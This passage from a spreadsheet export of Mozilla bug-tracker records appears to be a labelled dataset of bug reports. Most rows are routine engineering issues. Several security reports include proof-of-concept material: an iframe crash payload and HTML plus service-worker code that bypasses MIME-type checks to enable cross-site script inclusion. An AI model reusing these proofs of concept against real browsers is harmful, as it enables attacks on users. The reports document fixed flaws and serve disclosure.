        <v>1</v>
      </c>
      <c r="F6318" t="n">
        <v>1</v>
      </c>
      <c r="G6318" t="n">
        <v>3</v>
      </c>
      <c r="H6318" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6318" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6318" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6318" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6318" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6318" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6318" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6318" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6318" t="inlineStr">
        <is>
          <t>[sg:low] SA19698</t>
        </is>
      </c>
      <c r="Q6318" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6318" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6318" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T6318" t="n">
        <v>1</v>
      </c>
      <c r="U6318" t="n">
        <v>0</v>
      </c>
      <c r="V6318" t="n">
        <v>44</v>
      </c>
      <c r="W6318" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
A bug has been discovered by myself(TeamOverload) in Firefox
1.5.0.2(other versions are probably affected too).  Through a
specially crafted webpage you can have any file be disguised as an
image.  If you then right click-view image, the file will attempt to
download or just run if it is on the bypass list.  Some extensions
such as .wma are defaulted like that and a malformed wma can be loaded
just by going to view image.  Other websites can be loaded this way as
well.
Reproducible: Always
Steps to Reproduce:
1.Download attached archive that causes problem
2.Launch web page, and right click and choose show image on both
3.First image should open WindowsMediaPlayer and the second should go to a different web page.
Actual Results:  
Both WMP and the alternate web page opened.
Expected Results:  
The browser should deny access to both of the corrupt images such as done in Internet Explorer.
This allows system access and has been confirmed by Secunia as they are currently creating an advisory.</t>
        </is>
      </c>
      <c r="X6318" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6319">
      <c r="A6319" t="n">
        <v>830389</v>
      </c>
      <c r="B6319" t="inlineStr">
        <is>
          <t>2013-01-14 09:21:11 -0800</t>
        </is>
      </c>
      <c r="C6319" t="inlineStr">
        <is>
          <t>compartment mismatch in js_ValueToSource inside js::ReportIsNotFunction</t>
        </is>
      </c>
      <c r="D6319" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:25 -0800</t>
        </is>
      </c>
      <c r="E6319" t="n">
        <v>1</v>
      </c>
      <c r="F6319" t="n">
        <v>1</v>
      </c>
      <c r="G6319" t="n">
        <v>3</v>
      </c>
      <c r="H6319" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6319" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6319" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6319" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6319" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6319" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6319" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6319" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6319" t="inlineStr">
        <is>
          <t>[qa-][adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q6319" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6319" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6319" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T6319" t="n">
        <v>1</v>
      </c>
      <c r="U6319" t="n">
        <v>0</v>
      </c>
      <c r="V6319" t="n">
        <v>33</v>
      </c>
      <c r="W6319" t="inlineStr">
        <is>
          <t>I came across this stack report:
https://crash-stats.mozilla.com/report/index/c8be7cc5-f067-4ec6-9eec-34bac2130112
I'm not sure what the real problem is here, but the immediate problem appears to be that js_ValueToSource turns a value into an object, then runs code on it without entering the compartment.
0 js::CompartmentChecker::fail 	js/src/jscntxtinlines.h:205
1 js::InvokeKernel 	js/src/jsinterp.cpp:391
2 js::Invoke 	js/src/jsinterp.cpp:439
3 js_ValueToSource 	js/src/jsstr.cpp:3537
4 js::DecompileValueGenerator 	js/src/jsopcode.cpp:6260
5 js_ReportValueErrorFlags 	js/src/jscntxt.cpp:1014
6 js::ReportIsNotFunction 	js/src/jsinterp.cpp:271
7 js::InvokeKernel 	js/src/jsinterp.cpp:370
8 js::Interpret 	js/src/jsinterp.cpp:2368
9 js::RunScript 	js/src/jsinterp.cpp:340
10 UncachedInlineCall 	js/src/methodjit/InvokeHelpers.cpp:372
11 js::mjit::stubs::UncachedCallHelper 	js/src/methodjit/InvokeHelpers.cpp:460
12 js::mjit::CallCompiler::update 	js/src/methodjit/MonoIC.cpp:1236
13 js::mjit::ic::Call 	js/src/methodjit/MonoIC.cpp:1317
14 js::mjit::EnterMethodJIT 	js/src/methodjit/MethodJIT.cpp:1041
15 js::RunScript 	js/src/jsinterp.cpp:345</t>
        </is>
      </c>
      <c r="X6319" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6320">
      <c r="A6320" t="n">
        <v>1880879</v>
      </c>
      <c r="B6320" t="inlineStr">
        <is>
          <t>2024-02-19 11:15:23 -0800</t>
        </is>
      </c>
      <c r="C6320" t="inlineStr">
        <is>
          <t>Parent process crash with iframe with src=file:. or src=file:..</t>
        </is>
      </c>
      <c r="D6320" t="inlineStr">
        <is>
          <t>2024-11-06 12:05:26 -0800</t>
        </is>
      </c>
      <c r="E6320" t="n">
        <v>1</v>
      </c>
      <c r="F6320" t="n">
        <v>1</v>
      </c>
      <c r="G6320" t="n">
        <v>3</v>
      </c>
      <c r="H6320" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6320" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6320" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K6320" t="inlineStr">
        <is>
          <t>Firefox 122</t>
        </is>
      </c>
      <c r="L6320" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M6320" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6320" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6320" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6320" t="inlineStr">
        <is>
          <t>[domsecurity-active][crash fixed in v126 by 1887614]</t>
        </is>
      </c>
      <c r="Q6320" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6320" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6320" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T6320" t="n">
        <v>1</v>
      </c>
      <c r="U6320" t="n">
        <v>0</v>
      </c>
      <c r="V6320" t="n">
        <v>19</v>
      </c>
      <c r="W6320" t="inlineStr">
        <is>
          <t>Created attachment 9380886
bug.png
Steps to reproduce:
 A remote attacker could create a specially-crafted Web page containing 
&lt;iframe src=file:.&gt;&lt;/iframe&gt; or &lt;iframe src=file:..&gt;&lt;/iframe&gt;
which would cause a segmentation fault error.
Actual results:
When you open the file (http://localhost/file.php), this causes the browser to crash.
If someone hosts a website with this and sends the link to another person, it would cause the victim's Web browser to crash once the website tries to get the value from "file:.".
I can reproduce the bug on Windows, Linux, and Android.
the report id: bp-b979de7a-388f-489a-ab4d-468df0240219</t>
        </is>
      </c>
      <c r="X6320" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6321">
      <c r="A6321" t="n">
        <v>1254130</v>
      </c>
      <c r="B6321" t="inlineStr">
        <is>
          <t>2016-03-07 06:58:21 -0800</t>
        </is>
      </c>
      <c r="C6321" t="inlineStr">
        <is>
          <t>Stability rollup is not running reliably</t>
        </is>
      </c>
      <c r="D6321" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E6321" t="n">
        <v>1</v>
      </c>
      <c r="F6321" t="n">
        <v>1</v>
      </c>
      <c r="G6321" t="n">
        <v>6</v>
      </c>
      <c r="H6321" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6321" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J6321" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K6321" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6321" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6321" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6321" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6321" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6321" t="inlineStr"/>
      <c r="Q6321" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6321" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6321" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6321" t="n">
        <v>1</v>
      </c>
      <c r="U6321" t="n">
        <v>0</v>
      </c>
      <c r="V6321" t="n">
        <v>6</v>
      </c>
      <c r="W6321" t="inlineStr">
        <is>
          <t>The stability rollup scheduled job is not running reliably:
https://analysis.telemetry.mozilla.org/schedule/logs/1103
The last four jobs are:
stability rollup.20160304180250.log.gz
stability rollup.20160304180242.log.gz
stability rollup.20160302180319.log.gz
stability rollup.20160301180242.log.gz
So it skipped 03-03. Or at least delayed 03-03 until the fourth, at which point the two jobs overlapped, and that caused them both to fail because they were trying to make overlapping redshift schema changes.
I manually backfilled the 03-03 and 03-04 data on Friday.
The job does not appear to have run correctly over the weekend.</t>
        </is>
      </c>
      <c r="X6321" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6322">
      <c r="A6322" t="n">
        <v>443327</v>
      </c>
      <c r="B6322" t="inlineStr">
        <is>
          <t>2008-07-02 20:38:22 -0700</t>
        </is>
      </c>
      <c r="C6322" t="inlineStr">
        <is>
          <t>Bring up physical hardware to isolate VMWare as a cause of unit test failures</t>
        </is>
      </c>
      <c r="D6322" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6322" t="n">
        <v>1</v>
      </c>
      <c r="F6322" t="n">
        <v>1</v>
      </c>
      <c r="G6322" t="n">
        <v>5</v>
      </c>
      <c r="H6322" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6322" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6322" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6322" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6322" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6322" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6322" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6322" t="inlineStr"/>
      <c r="Q6322" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6322" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6322" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6322" t="n">
        <v>1</v>
      </c>
      <c r="U6322" t="n">
        <v>0</v>
      </c>
      <c r="V6322" t="n">
        <v>5</v>
      </c>
      <c r="W6322" t="inlineStr">
        <is>
          <t>qm-centos5-moz2-01 and 02 are showing intermittent failures.  (see blocked bugs)
No idea whether this is a machine configuration issue, VM issue, or a bad test - but let's try and isolate all variables at once.  To start let's go ahead and bring up a 2-3 physical hosts (we can steal 2 talos mini's if that works) to see if they are more reliable.  
Lukas you were volunteered for this task :-)</t>
        </is>
      </c>
      <c r="X6322" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6323">
      <c r="A6323" t="n">
        <v>1035867</v>
      </c>
      <c r="B6323" t="inlineStr">
        <is>
          <t>2014-07-08 08:36:00 -0700</t>
        </is>
      </c>
      <c r="C6323" t="inlineStr">
        <is>
          <t>Fail to launch webapp with TypeError: navigator.mozApps is undefined</t>
        </is>
      </c>
      <c r="D6323" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:00 -0800</t>
        </is>
      </c>
      <c r="E6323" t="n">
        <v>1</v>
      </c>
      <c r="F6323" t="n">
        <v>1</v>
      </c>
      <c r="G6323" t="n">
        <v>6</v>
      </c>
      <c r="H6323" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6323" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J6323" t="inlineStr">
        <is>
          <t>Web Apps (PWAs)</t>
        </is>
      </c>
      <c r="K6323" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6323" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6323" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6323" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6323" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6323" t="inlineStr">
        <is>
          <t>[WebRuntime]</t>
        </is>
      </c>
      <c r="Q6323" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6323" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6323" t="inlineStr">
        <is>
          <t>Firefox 33</t>
        </is>
      </c>
      <c r="T6323" t="n">
        <v>1</v>
      </c>
      <c r="U6323" t="n">
        <v>0</v>
      </c>
      <c r="V6323" t="n">
        <v>21</v>
      </c>
      <c r="W6323" t="inlineStr">
        <is>
          <t>Created attachment 8452353
webapp-startup-test.apk
1. adb install webapp-startup-test.apk
2. adb shell 'am start  -n com.firefox.cli.apk.webappstartupperformancetestbclary.pc91282b8e6a
542101851c47a670b9c8c/org.mozilla.android.synthapk.LauncherActivity -a android.intent.action.MAIN --es env0 MOZ_CRASHREPORTER_NO_REPORT=1'
E/GeckoConsole(18340): Full Message: {file: "chrome://browser/content/WebappRT.js" line: 83 column: 0 source: "83"}]
Full message: TypeError: navigator.mozApps is undefined
Full stack: WebappRT.getManifestFor/&lt;@chrome://browser/content/WebappRT.js:83:11
Handler.prototype.process@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:866:23
this.PromiseWalker.walkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:745:7
this.DOMApplicationRegistry.doGetList@resource://gre/modules/Webapps.jsm:1134:7
this.DOMApplicationRegistry.receiveMessage@resource://gre/modules/Webapps.jsm:1005:1
init@resource://gre/modules/AppsServiceChild.jsm:111:16
@resource://gre/modules/AppsServiceChild.jsm:391:1
@jar:jar:file:///data/app/org.mozilla.fennec-1.apk!/assets/omni.ja!/components/Webapps.js:15:1
WebappRT.getManifestFor/&lt;@chrome://browser/content/WebappRT.js:83:11
Handler.prototype.process@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:866:23
this.PromiseWalker.walkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:745:7
good: http://hg.mozilla.org/integration/mozilla-inbound/rev/f81fe2b04fef
bad: http://hg.mozilla.org/integration/mozilla-inbound/rev/b2fd5a214d2a
Maybe bug 903291 ? I'm trying to bisect now.</t>
        </is>
      </c>
      <c r="X6323" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6324">
      <c r="A6324" t="n">
        <v>1464680</v>
      </c>
      <c r="B6324" t="inlineStr">
        <is>
          <t>2018-05-27 07:20:22 -0700</t>
        </is>
      </c>
      <c r="C6324" t="inlineStr">
        <is>
          <t>Add WebRTC gn-configs for FreeBSD armv7 and OpenBSD aarch64</t>
        </is>
      </c>
      <c r="D6324" t="inlineStr">
        <is>
          <t>2019-04-21 18:26:16 -0700</t>
        </is>
      </c>
      <c r="E6324" t="n">
        <v>1</v>
      </c>
      <c r="F6324" t="n">
        <v>1</v>
      </c>
      <c r="G6324" t="n">
        <v>7</v>
      </c>
      <c r="H6324" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6324" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J6324" t="inlineStr">
        <is>
          <t>General: Unsupported Platforms</t>
        </is>
      </c>
      <c r="K6324" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6324" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6324" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6324" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6324" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6324" t="inlineStr"/>
      <c r="Q6324" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R6324" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6324" t="inlineStr">
        <is>
          <t>mozilla62</t>
        </is>
      </c>
      <c r="T6324" t="n">
        <v>1</v>
      </c>
      <c r="U6324" t="n">
        <v>0</v>
      </c>
      <c r="V6324" t="n">
        <v>11</v>
      </c>
      <c r="W6324" t="inlineStr">
        <is>
          <t>Let's add more BSD configs even if untested in order to unblock Tier3 porting effort.</t>
        </is>
      </c>
      <c r="X6324" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6325">
      <c r="A6325" t="n">
        <v>758471</v>
      </c>
      <c r="B6325" t="inlineStr">
        <is>
          <t>2012-05-24 18:09:06 -0700</t>
        </is>
      </c>
      <c r="C6325" t="inlineStr">
        <is>
          <t>Don't sweep native interfaces during compartment GC</t>
        </is>
      </c>
      <c r="D6325" t="inlineStr">
        <is>
          <t>2012-07-20 18:25:06 -0700</t>
        </is>
      </c>
      <c r="E6325" t="n">
        <v>1</v>
      </c>
      <c r="F6325" t="n">
        <v>1</v>
      </c>
      <c r="G6325" t="n">
        <v>3</v>
      </c>
      <c r="H6325" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6325" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6325" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K6325" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6325" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6325" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6325" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6325" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6325" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q6325" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6325" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6325" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T6325" t="n">
        <v>1</v>
      </c>
      <c r="U6325" t="n">
        <v>0</v>
      </c>
      <c r="V6325" t="n">
        <v>10</v>
      </c>
      <c r="W6325" t="inlineStr">
        <is>
          <t>Created attachment 627060
patch
This is the one aspect of bug 715761 that was correctness-related. Right now, we mark native interfaces when we mark XPCWrappedNativeProto and XPCWrappedNative. We won't mark an XPCWrappedNativeProto or XPCWrappedNative if it's not in a compartment that's being collected. However, we'll still sweep their native interfaces. That's bad.
This patch skips the sweeping if we aren't collecting all compartments. This is kind of an imperfect solution, because most GCs now are compartment GCs. However, it's hard for me to think of a situation where we'll accumulate tons of native interfaces in a short period of time. So I think it's okay that they have to wait until a full GC to be swept.
Eventually it would be nice if the maps for native interfaces were per-compartment rather than per-runtime. Then we could sweep only the ones that were marked. But that's a bigger change than I have time for right now.
The motivation for this is that I saw a stack pop on tryserver today with native interface sweeping at the top. So it seems like we might be hitting this. Recent patches have made it a lot more likely.</t>
        </is>
      </c>
      <c r="X6325" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6326">
      <c r="A6326" t="n">
        <v>1669355</v>
      </c>
      <c r="B6326" t="inlineStr">
        <is>
          <t>2020-10-05 13:55:37 -0700</t>
        </is>
      </c>
      <c r="C6326" t="inlineStr">
        <is>
          <t>ServiceWorker intercepted channels don't run main fetch step 12 MIME type checks; nsHttpChannel logic should be moved into HttpBaseChannel</t>
        </is>
      </c>
      <c r="D6326" t="inlineStr">
        <is>
          <t>2024-04-10 02:51:53 -0700</t>
        </is>
      </c>
      <c r="E6326" t="n">
        <v>1</v>
      </c>
      <c r="F6326" t="n">
        <v>1</v>
      </c>
      <c r="G6326" t="n">
        <v>3</v>
      </c>
      <c r="H6326" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6326" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6326" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K6326" t="inlineStr">
        <is>
          <t>Firefox 81</t>
        </is>
      </c>
      <c r="L6326" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6326" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6326" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6326" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6326" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main83+][adv-esr78.5+]</t>
        </is>
      </c>
      <c r="Q6326" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6326" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6326" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T6326" t="n">
        <v>1</v>
      </c>
      <c r="U6326" t="n">
        <v>0</v>
      </c>
      <c r="V6326" t="n">
        <v>38</v>
      </c>
      <c r="W6326" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Steps to reproduce:
- Set up a simple web server that responds to /aaa.csv with a csv file (content-type: text/csv)
- Create an HTML page containing &lt;script src='/aaa.csv'&gt;&lt;/script&gt;
- FF will pop an error (in console) saying "The resource from '/aaa.csv' was blocked due to MIME type (“text/csv”) mismatch". (that's the desired behavior)
In order to bypass this restriction, set up a service worker "proxy" layer. It will serve the content from a local cache. FF will execute the fetched content (despite the content-type which isn't application/javascript) This effectively opens up a class of vulnerabilities, the most notable that comes to my mind is XSSI (Cross Site Script Inclusion).
HTML Code:
&lt;html&gt;&lt;body&gt;
&lt;script&gt;navigator.serviceWorker.register('sw.js');&lt;/script&gt;
&lt;script src='/intercept'&gt;&lt;/script&gt;
&lt;/body&gt;&lt;/html&gt;
-----------------------------------
SW Code:
self.addEventListener('fetch', (event) =&gt; {
	const url = 'http://localhost:8081/aaaafffa.csv?11';
	if(event.request.url.endsWith('/intercept'))
    event.respondWith(
        caches.match(event.request)
            .then((response) =&gt; response || 
				fetch(url, {
				method  : 'GET',
				mode    : 'no-cors',
				credentials: 'include',
				headers : {'Content-type':'application/x-www-form-urlencoded'}
				})
			)
            .catch(() =&gt; caches.match('offline')),
    );
});
Actual results:
JavaScript execution is possible - bypassing script inclusion security restrictions. (This allows a set of XSSI attacks)
Expected results:
JavaScript execution should be blocked due to mismatching MIME type</t>
        </is>
      </c>
      <c r="X6326" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6327">
      <c r="A6327" t="n">
        <v>1492506</v>
      </c>
      <c r="B6327" t="inlineStr">
        <is>
          <t>2018-09-19 09:16:43 -0700</t>
        </is>
      </c>
      <c r="C6327" t="inlineStr">
        <is>
          <t>Many Focus+GeckoView crash reports are missing symbols for libxul.so, libmozglue.so</t>
        </is>
      </c>
      <c r="D6327" t="inlineStr">
        <is>
          <t>2018-11-11 16:56:31 -0800</t>
        </is>
      </c>
      <c r="E6327" t="n">
        <v>1</v>
      </c>
      <c r="F6327" t="n">
        <v>1</v>
      </c>
      <c r="G6327" t="n">
        <v>4</v>
      </c>
      <c r="H6327" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6327" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J6327" t="inlineStr">
        <is>
          <t>Symbols</t>
        </is>
      </c>
      <c r="K6327" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6327" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6327" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6327" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6327" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6327" t="inlineStr">
        <is>
          <t>[geckoview:klar:p1]</t>
        </is>
      </c>
      <c r="Q6327" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6327" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6327" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6327" t="n">
        <v>1</v>
      </c>
      <c r="U6327" t="n">
        <v>0</v>
      </c>
      <c r="V6327" t="n">
        <v>17</v>
      </c>
      <c r="W6327" t="inlineStr">
        <is>
          <t>Many GeckoView crash reports are not symbolicated, e.g.:
[@ libxul.so@0x8d6ca2 | libxul.so@0x9443cd | libmozglue.so@0x4e16f ]
bp-a56fd9aa-c30d-485f-9e41-da4480180918
https://crash-stats.mozilla.com/search/?product=Focus&amp;version=62.0&amp;version=62.0.1&amp;version=62.0.2&amp;date=%3E%3D2018-09-12T08%3A51%3A39.000Z&amp;date=%3C2018-09-19T08%3A51%3A39.000Z&amp;_sort=-date&amp;_facets=signature&amp;_columns=date&amp;_columns=signature&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform#facet-signature
Focus 7.0 uses GeckoView 62. Socorro knows about a "Focus" product name, but GeckoView 62 is still sending the "FennecAndroid" product name. (GeckoView 64 will send the proper "Focus" product name.) In the meantime, the Socorro backend rewrites the product name of crash reports with (Product="FennecAndroid" AND Version=62.0 AND Process Type="content") to "Focus". Fennec does not use e10s so all content process crashes are from GeckoView.
The Focus product name rewriting landed in bug 1481696.</t>
        </is>
      </c>
      <c r="X6327" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6328">
      <c r="A6328" t="n">
        <v>126756</v>
      </c>
      <c r="B6328" t="inlineStr">
        <is>
          <t>2002-02-20 12:51:13 -0800</t>
        </is>
      </c>
      <c r="C6328" t="inlineStr">
        <is>
          <t>error submitting Javascript Engine bug</t>
        </is>
      </c>
      <c r="D6328" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E6328" t="n">
        <v>1</v>
      </c>
      <c r="F6328" t="n">
        <v>1</v>
      </c>
      <c r="G6328" t="n">
        <v>4</v>
      </c>
      <c r="H6328" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6328" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6328" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6328" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6328" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6328" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N6328" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6328" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6328" t="inlineStr"/>
      <c r="Q6328" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6328" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6328" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T6328" t="n">
        <v>0</v>
      </c>
      <c r="U6328" t="n">
        <v>0</v>
      </c>
      <c r="V6328" t="n">
        <v>7</v>
      </c>
      <c r="W6328" t="inlineStr">
        <is>
